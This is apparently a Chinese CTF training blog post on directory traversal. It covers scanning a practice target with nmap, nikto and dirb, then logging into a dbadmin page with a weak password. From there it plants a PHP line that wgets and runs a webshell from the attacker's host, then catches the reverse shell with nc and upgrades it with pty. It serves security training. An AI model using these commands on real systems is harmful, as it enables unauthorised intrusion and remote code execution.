CTF訓練 web安全目錄遍歷

目錄遍歷漏洞介紹

路徑遍歷攻擊(也稱爲目錄遍歷)旨在訪問存儲在Web根文件夾之外的文件和目錄。通過操縱帶有“點-斜線(…)”序列及其變化的文件或使用絕對文件路徑來引用文件的變量,可以訪問存儲在文件系統上的任意文件和目錄,包括應用程序源代碼、配置和關鍵系統文件。
需要注意的是,系統操作訪問控制(如在微軟Windows操作系統上鎖定或使用文件)限制了對文件的訪問權限。
這種攻擊也稱爲“點-點斜線”、“目錄遍歷”、“目錄爬升”和“回溯”。

信息探測

這次只說一下信息探測的以往的語法:

掃描主機服務信息以及服務版本
nmap -sV 靶場IP地址

快速掃描主機全部信息
nmap -T4 –A -v 靶場IP地址

探測敏感信息
nikto -host http://靶場IP地址:端口
目錄信息探測 dirb http://靶場IP:端口

深入挖掘

分析nmap 、nikto掃描結果,並對結果進行分析,挖掘可以利用的信息;
例如:端口開放的http服務要充分利用。
敏感目錄
一些url(dbadmin、php)等一些敏感詞彙。

接着使用瀏覽器打開 http://ip:port/敏感頁面,查看敏感信息,找到可利用的位置;

漏洞掃描

owasp-zap web漏洞掃描器,自動挖掘web應用程序中的漏洞

打開終端輸入owasp-zap 會出現一下所示:
在這裏插入圖片描述在這裏插入圖片描述
然後利用掃描器進行掃描,掃描完畢之後,alerts選項如果出現紅色圖標那就證明是高危漏洞。點擊會出現目錄信息。即目錄遍歷漏洞。

分析漏洞掃描結果

利用目錄遍歷漏洞獲取shell思路:

上傳webshell到服務器,之後通過對應的目錄遍歷路徑訪問webshell,執行webshell。在kali linux當中獲取反彈shell;

敏感頁面上傳shell

dbadmin 敏感目錄有敏感頁面,瀏覽器訪問,使用弱口令嘗試登陸;
使用admin進行登錄可以進入系統後臺。

登陸頁面之後 查找可利用的寫webshell的點;

使用/usr/share/webshells/php/下的webshell
打開終端輸入 cd /usr/share/webshells/php 打開該目錄,然後使用ls進行查看webshell

利用cp 文件名/root/Desktop進行下載到桌面。

然後利用cd ls gedit進行查看下載內容(也可以進行修改其內容:IP地址修改爲攻擊機的IP地址ifconfig進行查看,端口號可以隨意修改)。

修改webshell名稱:```mv 文件名 修改後的文件名``

在系統後臺新建數據庫,數據表,字段(寫入<?php system(“cd /tmp;wget http://ip:port/webshell.php;chmod +x webshell.php;php webshell”);?>)
在這裏插入圖片描述
進行如上操作進行寫入。便於複製粘貼上傳webshell。

監聽反彈shell

創建服務器用於靶場機器下載對應webshell

python –m “SimpleHTTPServer”

啓動監聽 nc
nc –nlvp 端口號
端口號爲上述自己修改的端口號。

輸入id進行查看對應的權限

啓動終端
python –c “import pty;pty.spawn(‘/bin/bash’)”

返回對應的終端

發佈了49 篇原創文章 · 獲贊 12 · 訪問量 9765
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章